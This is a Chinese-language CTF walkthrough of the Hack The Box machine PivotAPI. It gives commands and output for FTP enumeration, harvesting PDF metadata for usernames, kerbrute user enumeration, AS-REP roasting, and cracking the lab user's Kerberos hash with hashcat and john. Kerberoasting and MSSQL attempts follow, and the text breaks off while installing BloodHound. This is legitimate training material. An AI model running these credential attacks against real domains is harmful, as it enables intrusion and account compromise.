PivotAPI
“红队笔记”学习记录
机器介绍
Pivotapi is an insane machine that involves user enumeration through the metadata of PDFs which are downloaded from a FTP file share server. Since the user has not got preauth with Kerberos it is possible to request a TGT for him which can be cracked with Hashcat. With the provided credentials an SMB enumeration exposes an executable which when reversed engineered reveals credentials to authenticate to MSSQL. After gaining access to the system it is possible to locate a keepass database on the target, leading to further misconfiguration abuse through Active Directory which leads obtaining the Administrator's password through LAPS and thus get execution on the target through `psexec` as user Administrator.
Pivotapi 是一台疯狂的机器,它涉及用户通过从 FTP 文件共享服务器下载的 PDF 元数据进行枚举。由于用户尚未获得 Kerberos 的预身份验证,因此可以为他请求 TGT,这可以通过 Hashcat 破解。使用提供的凭据,SMB 枚举公开一个可执行文件,当进行反向工程时,该可执行文件会显示凭据以向 MSSQL 进行身份验证。在获得对系统的访问权限后,可以在目标上找到一个keepass数据库,从而通过Active Directory导致进一步的错误配置滥用,从而导致通过LAPS获取管理员的密码,从而通过“psexec”作为用户管理员在目标上执行。
难度
Insane
信息搜集
tcp详细扫描:
sudo nmap -sT -sV -sC -O -p$tcports $ip1 -oA nmapscan/tcpdetails
# Nmap 7.94SVN scan initiated Mon Jan 15 15:24:33 2024 as: nmap -sT -sV -sC -O -p21,22,53,88,135,139,389,445,464,593,636,1433,3268,3269,9389,49667,49677,49678,49710,49784 -oA nmapscan/tcpdetails 10.129.228.115
Nmap scan report for 10.129.228.115 (10.129.228.115)
Host is up (0.38s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-19-21 02:06PM 103106 10.1.1.414.6453.pdf
| 02-19-21 02:06PM 656029 28475-linux-stack-based-buffer-overflows.pdf
| 02-19-21 11:55AM 1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
| 02-19-21 02:06PM 1018160 ExploitingSoftware-Ch07.pdf
| 08-08-20 12:18PM 219091 notes1.pdf
| 08-08-20 12:34PM 279445 notes2.pdf
| 08-08-20 12:41PM 105 README.txt
|_02-19-21 02:06PM 1301120 RHUL-MA-2009-06.pdf
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA)
| 256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA)
|_ 256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-15 08:24:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.129.228.115:1433:
| Target_Name: LICORDEBELLOTA
| NetBIOS_Domain_Name: LICORDEBELLOTA
| NetBIOS_Computer_Name: PIVOTAPI
| DNS_Domain_Name: LicorDeBellota.htb
| DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
| DNS_Tree_Name: LicorDeBellota.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-15T08:22:52
|_Not valid after: 2054-01-15T08:22:52
| ms-sql-info:
| 10.129.228.115:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-01-15T08:26:05+00:00; +59m39s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49784/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 59m38s, deviation: 0s, median: 59m38s
| smb2-time:
| date: 2024-01-15T08:25:25
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 15 15:26:39 2024 -- 1 IP address (1 host up) scanned in 126.25 seconds
nmap漏洞扫描脚本和udp扫描结果并没有显示有价值信息,因此跳过
扫描结果分析
注意到DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
和对应ip10.129.228.115
,结合所有暴露的端口都符合,可以大概推测这很可能是一台域控制器,因此要写入到hosts文件中便于后续访问;
从渗透的攻击面来看,按照经验优先考虑尝试利用端口21、445、88、3268
利用
ftp匿名登录下载文件
可以用ftp命令进行连接再下载,但是有时候下载过程中容易出问题,需要配置各种参数,比较复杂,并且最重要的是一定要启动binary模式。因此这里选择用wget
wget -m ftp://anonymous:随机密码@LicorDeBellota.htb
初步分析文件,挖掘敏感信息
┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# ls
10.1.1.414.6453.pdf BHUSA09-McDonald-WindowsHeap-PAPER.pdf notes1.pdf README.txt
28475-linux-stack-based-buffer-overflows.pdf ExploitingSoftware-Ch07.pdf notes2.pdf RHUL-MA-2009-06.pdf
发现只有一个txt,其他都是pdf,除了txt,其他先暂时不要轻易打开,查看txt内容:
┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# cat README.txt
VERY IMPORTANT!!
Don't forget to change the download mode to binary so that the files are not corrupted.
可以先查看剩余文件的元数据,从而快速提取潜在的敏感信息
┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# exiftool *.pdf |less
这里用了
less
方便查看时可以用鼠标自由滚动
发现Creator
和Author
字段的值是比较有潜在价值的,可以利用文本处理工具单独筛选出来:
exiftool *.pdf | grep -iE creator\|author | awk -F ":" '{print $2}' | grep -v -i microsoft | grep -vE '[0-9]' | uniq | tail -n 4 | sort | tee
pdf_authors
输出结果:
┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# cat pdf_authors
alex
byron gronseth
Kaorz
saif
然后逐步大致浏览一下每个pdf文件的内容,暂时也没有获取到什么敏感的用户凭据信息等,大部分都是和堆栈缓冲区溢出相关的参考资料和论文,并且开头也介绍了论文作者来自的大学,但是目前暂时都没有利用价值,先放在一边备用,等最后没有思路了再仔细看看这些文章
尝试获取smb共享
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# crackmapexec smb $ip1
SMB 10.129.228.115 445 PIVOTAPI [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# smbmap -H $ip1
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. on line 970
Traceback (most recent call last):
File "/usr/bin/smbmap", line 33, in <module>
sys.exit(load_entry_point('smbmap==1.9.2', 'console_scripts', 'smbmap')())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1435, in main
host = [ host for host in share_drives_list.keys() ][0]
^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# smbclient -L //$ip1 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.115 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
通过以上方式尝试无凭据连接smb服务获取共享资源均失败
尝试连接rpc服务
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U '' -N $ip1
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit
这表明在没有任何凭据时是无法连接rpc的
尝试用户名枚举
由于这是在域环境中,所以这里尝试用基于kerberos
协议的用户枚举工具kerbrute
kerberos
作为网络认证协议,允许在网络上进行节点间的安全身份验证,在kerberos
环境中,用户或服务的身份验证是基于密钥而不是密码,kerbrute
的用户枚举基于一个kerberos
的特性-当一个不存在的用户尝试认证时,kerberos
返回一个错误提示:客户端身份未知,但是如果用户名存在、密码错误,kerberos
返回另一个错误提示。该工具根据这种特性,对于提供的用户名列表中的每一个用户,分别发送带有错误密码的认证请求,从而根据kerberos
的响应来验证给定的用户名是否存在,这种方式快速并且隐蔽,因为只是发送认证请求而不是实际验证,不会触发用户锁定策略
如果是arm架构如苹果芯片的电脑,需要编译,编译时要注意:
在克隆的github库中,修改Makefile文件,在开头的ARCHS=
中添加arm64,编译时执行make linux
即可,如果有提示缺少什么模块,安装后再重新执行该命令
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# kerbrute userenum -d LicorDebellota.htb --dc $ip1 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 1000
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/27/24 - Ronnie Flathers @ropnop
2024/01/27 17:28:05 > Using KDC(s):
2024/01/27 17:28:05 > 10.129.228.115:88
2024/01/27 17:28:31 > [+] VALID USERNAME: jari@LicorDebellota.htb
2024/01/27 17:31:31 > [+] VALID USERNAME: administrador@LicorDebellota.htb
2024/01/27 17:37:38 > [+] VALID USERNAME: sshd@LicorDebellota.htb
2024/01/27 17:52:40 > [+] VALID USERNAME: lothbrok@LicorDebellota.htb
2024/01/27 18:21:43 > Done! Tested 8295455 usernames (4 valid) in 3218.585 seconds
这里用-t
指定线程数,具体要根据性能和远程服务器的防御机制做权衡,如果设置太快容易被检测拦截。
将新爆破出的用户名添加到最初信息搜集的pdf_authors
中:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cp pdf_authors users_list
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# nt users_list
#注意这里的nt是我自己重命名的命令
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat users_list
alex
byron gronseth
byron
gronseth
Kaorz
saif
jari
administrador
sshd
lothbrok
由于第二个用户名是组合的,可以分别拆开作为用户名,扩大可能性
尝试AS-REP ROASTING爆破攻击
域渗透时,每当收集到一组潜在的用户名,就要想到用这种方式,看是否碰巧有某个用户不需要域认证(即标志
UF_DONT_REQUIRE_PREAUTH
设置为真,将允许启用kerberos的认证过程,尽管我们不能成功认证,但在此过程中可以得到用户凭据哈希TGT,就可以尝试破解该哈希)。PREAUTH
是预先身份验证,AS
是授权服务,在kerberos
认证中,如果启用了预先身份验证,那么在AS
返回用户的TGT之前,用户首先需要证明他们知道正确的密码,这样就增加了额外的安全性,然而如果禁用了预先身份验证,攻击者可以请求TGT,即使不知道正确的密码,最后尝试离线破解该加密的TGT即可
这个攻击过程需要用到impacket
框架中的GetNPUsers
python脚本工具
可以用locate
命令来定位,注意要用apt
先安装locate
并更新好数据库:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# updatedb
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# locate -i getnp
/pentest/impacket/build/scripts-3.11/GetNPUsers.py
/pentest/impacket/examples/GetNPUsers.py
/usr/local/bin/GetNPUsers.py
/usr/local/bin/__pycache__/GetNPUsers.cpython-311.pyc
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/GetNPUsers.py
/usr/share/doc/python3-impacket/examples/GetNPUsers.py
# 复制最后这个路径并添加软链接:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ln -s /usr/share/doc/python3-impacket/examples/GetNPUsers.py /usr/bin/GetNPUsers.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# GetNPUsers.py -h
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE] [-format {hashcat,john}] [-usersfile USERSFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address] [-dc-host hostname]
target
Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking
positional arguments:
target [[domain/]username[:password]]
options:
-h, --help show this help message and exit
-request Requests TGT for users and output them in JtR/hashcat format (default False)
-outputfile OUTPUTFILE
Output filename to write ciphers in JtR/hashcat format
-format {hashcat,john}
format to save the AS_REQ of users without pre-authentication. Default is hashcat
-usersfile USERSFILE File with user per line to test
-ts Adds timestamp to every logging output
-debug Turn DEBUG output ON
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
connection:
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
-dc-host hostname Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
执行脚本:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# GetNPUsers.py -no-pass -dc-ip $ip1 LicorDebellota.htb/ -usersfile users_list
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff773956ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User jari doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrador doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sshd doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lothbrok doesn't have UF_DONT_REQUIRE_PREAUTH set
注意这里的域名后要加上/
,从结果中我们提取到了用户Kaorz
的TGT哈希:$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff773956ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3
这里就存在一个疑问,为什么kerberos要将某些用户启用预先身份验证,有些又不需要呢?这里有以下几种可能原因:
(1)兼容性问题。早期的kerberos客户端可能不支持这种预先身份验证,所以某些用户已经设置了该标志已确保与早期的kerberos客户端兼容;
(2)简化身份验证的需求。在某些情况下,域管理员希望消除这种预身份验证步骤以简化身份验证过程;
(3)特定应用程序或服务的要求
所以根据这些不可控的因素,导致攻击者有空子可以钻
将提取到的hash值单独存放一个文件中,并用john
或者hashcat
破解:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt Kaorz_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Roper4155 ($krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB)
1g 0:00:00:03 DONE (2024-01-27 23:32) 0.2652g/s 2830Kp/s 2830Kc/s 2830KC/s S100195..Ronald8
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat --help | grep -i rep
--nonce-error-corrections | Num | The BF size range to replace AP's nonce last bytes | --nonce-error-corrections=16
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat -m 18200 Kaorz_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i5-13500HX, 30953/61970 MB (8192 MB allocatable), 20MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 5 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff77395
6ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1
e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3:Roper4155
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c...f59cb3
Time.Started.....: Sat Jan 27 23:34:25 2024 (2 secs)
Time.Estimated...: Sat Jan 27 23:34:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 5252.7 kH/s (2.30ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10670080/14344385 (74.39%)
Rejected.........: 0/10670080 (0.00%)
Restore.Point....: 10649600/14344385 (74.24%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: SEXY#2 -> RonaldoNathan
Hardware.Mon.#1..: Temp: 62c Util: 65%
Started: Sat Jan 27 23:34:09 2024
Stopped: Sat Jan 27 23:34:27 2024
两种方式都爆破出了密码Roper4155
,将该凭据记录到临时渗透笔记中。注意这里当使用hashcat破解前,可以先利用hash值中的可能标志来查找hashcat破解的hash类型,即确定-m
,这种类型特征标志一般是在开头的前部分,从上面也可以看出这种情况下使用john更快速简易,因为john会自动判断类型
获得凭据后,尝试是否能连接到对应服务,尝试连接ssh,发现无法连接,说明该用户没有创建ssh
尝试KERBEROASTING爆破攻击
这种攻击同样是在域环境中的,针对那些关联了服务主体名称的账号,通常是服务账号,例如数据库、web应用程序等,一旦攻击者在域环境中有一个有效的凭据,不一定是高权限的用户,普通用户凭据通常就足够,可以请求与特定SPN关联的服务票据,这些票据是使用服务账号进行加密的,攻击者同样也可以尝试捕获这些服务票据,并且离线破解出服务账号明文密码。与AS-REP ROASTING相似,两者都是利用kerberos的设计特性而非真正的漏洞,且
KERBEROASTING
攻击需要一个用户凭据为前提,而AS-REP ROASTING
不需要
同样也是利用impacket
框架中的python脚本
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# locate -i spns
/pentest/impacket/build/scripts-3.11/GetUserSPNs.py
/pentest/impacket/examples/GetUserSPNs.py
/usr/local/bin/GetUserSPNs.py
/usr/local/bin/__pycache__/GetUserSPNs.cpython-311.pyc
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/GetUserSPNs.py
/usr/share/doc/metasploit-framework/modules/auxiliary/gather/get_user_spns.md
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py
/usr/share/metasploit-framework/modules/auxiliary/gather/get_user_spns.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# ln -s /usr/share/doc/python3-impacket/examples/GetUserSPNs.py /usr/bin/GetUserSPNs.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# GetUserSPNs.py -h
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
usage: GetUserSPNs.py [-h] [-target-domain TARGET_DOMAIN] [-stealth] [-usersfile USERSFILE] [-request] [-request-user username] [-save] [-outputfile OUTPUTFILE] [-ts] [-debug]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-dc-host hostname]
target
Queries target domain for SPNs that are running under a user account
positional arguments:
target domain[/username[:password]]
options:
-h, --help show this help message and exit
-target-domain TARGET_DOMAIN
Domain to query/request if different than the domain of the user. Allows for Kerberoasting across trusts.
-stealth Removes the (servicePrincipalName=*) filter from the LDAP query for added stealth. May cause huge memory consumption / errors on large domains.
-usersfile USERSFILE File with user per line to test
-request Requests TGS for users and output them in JtR/hashcat format (default False)
-request-user username
Requests TGS for the SPN associated to the user specified (just the username, no domain needed)
-save Saves TGS requested to disk. Format is <username>.ccache. Auto selects -request
-outputfile OUTPUTFILE
Output filename to write ciphers in JtR/hashcat format
-ts Adds timestamp to every logging output
-debug Turn DEBUG output ON
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
connection:
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter. Ignoredif -target-domain is specified.
-dc-host hostname Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
尝试攻击:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# GetUserSPNs.py -dc-ip $ip1 LicorDebellota.htb/kaorz:Roper4155
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
No entries found!
说明该用户不与任何SPN相关联
尝试获取数据库凭据
重新查看扫描的端口,与获取凭据相关的还有数据库服务,利用方式同样可以使用impacket
框架中的python脚本
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# locate -i mssqlcli
/pentest/impacket/build/scripts-3.11/mssqlclient.py
/pentest/impacket/examples/mssqlclient.py
/usr/local/bin/__pycache__/mssqlclient.cpython-311.pyc
/usr/local/bin/mssqlclient.py
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/mssqlclient.py
/usr/share/doc/python3-impacket/examples/mssqlclient.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# ln -s /usr/share/doc/python3-impacket/examples/mssqlclient.py /usr/bin/mssqlclient.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# mssqlclient.py -h
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-show] [-file FILE] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target
TDS client implementation (SSL supported).
positional arguments:
target [[domain/]username[:password]@]<targetName or address>
options:
-h, --help show this help message and exit
-port PORT target MSSQL port (default 1433)
-db DB MSSQL database instance (default None)
-windows-auth whether or not to use Windows Authentication (default False)
-debug Turn DEBUG output ON
-show show the queries
-file FILE input file with commands to execute in the SQL shell
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# mssqlclient.py LicorDebellota.htb/kaorz:Roper4155@$ip1
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
连接不了,说明该用户没有连接数据库的权限
尝试获取更多潜在攻击路径
既然已知的端口我们都利用完了,没有利用成功,还可以利用bloodhound
工具来探测更多潜在的可尝试攻击路径
Bloodhound
使用凭据泄露和域环境中的关系数据来构建域图,展示域中的权限关系和攻击路径。它通过收集信息,识别域用户、组、计算机和关系,以及评估域策略和权限来帮助安全团队识别潜在的攻击路径和安全漏洞。
由于我们已经获取到了一个凭据,因此除了该工具的主程序,我们还要安装对应的域信息采集器,即impacket
框架中的一个python脚本:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# apt search bloodhound
Sorting... Done
Full Text Search... Done
bloodhound/kali-rolling,now 4.3.1-0kali2 amd64 [installed]
Six Degrees of Domain Admin
bloodhound-dbgsym/kali-rolling 4.3.1-0kali2 amd64
debug symbols for bloodhound
bloodhound.py/kali-rolling,kali-rolling 1.7.2-0kali1 all
ingestor for BloodHound, based on Impacket (Python 3)
